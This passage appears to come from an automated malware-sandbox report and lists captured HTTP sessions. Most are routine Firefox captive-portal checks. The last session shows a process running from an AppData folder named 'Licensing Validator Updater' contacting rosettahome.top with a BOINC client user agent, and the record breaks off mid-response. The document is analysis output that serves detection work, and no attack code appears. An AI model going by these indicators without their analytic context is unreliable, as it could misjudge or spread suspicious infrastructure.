                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.092423916 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80171
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.096714973 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:06.116811991 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:16.127939939 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:26.142843008 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:36.156897068 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      3192.168.2.164974134.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.255976915 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      4192.168.2.164974234.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.461796045 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.929651022 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8847
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.778038025 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.938069105 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8857
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.925513983 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:30.024449110 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8859
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:30.272217989 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:30.371148109 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8860
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.204768896 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:32.304804087 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8862
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:34.844511032 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:34.957496881 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8864
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.445352077 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:37.544465065 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8867
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.530268908 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.630106926 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8872
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.700100899 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.799429893 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8874
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:49.026921988 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:49.126988888 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8879
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:51.513211966 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:51.612582922 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8881
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:01.615540981 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.602602005 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.701710939 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8895
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:14.819272041 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:15.046530008 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8904
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:17.142991066 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:17.242892981 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8907
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:27.250646114 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:37.258672953 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.095351934 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.194338083 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8936
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:56.207792997 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:06.226804972 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:16.238934040 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:26.254053116 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:36.266885996 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      5192.168.2.1649813104.238.61.8801276C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.504070044 CET147OUTGET /rosettahome/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:34.085891008 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:34 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
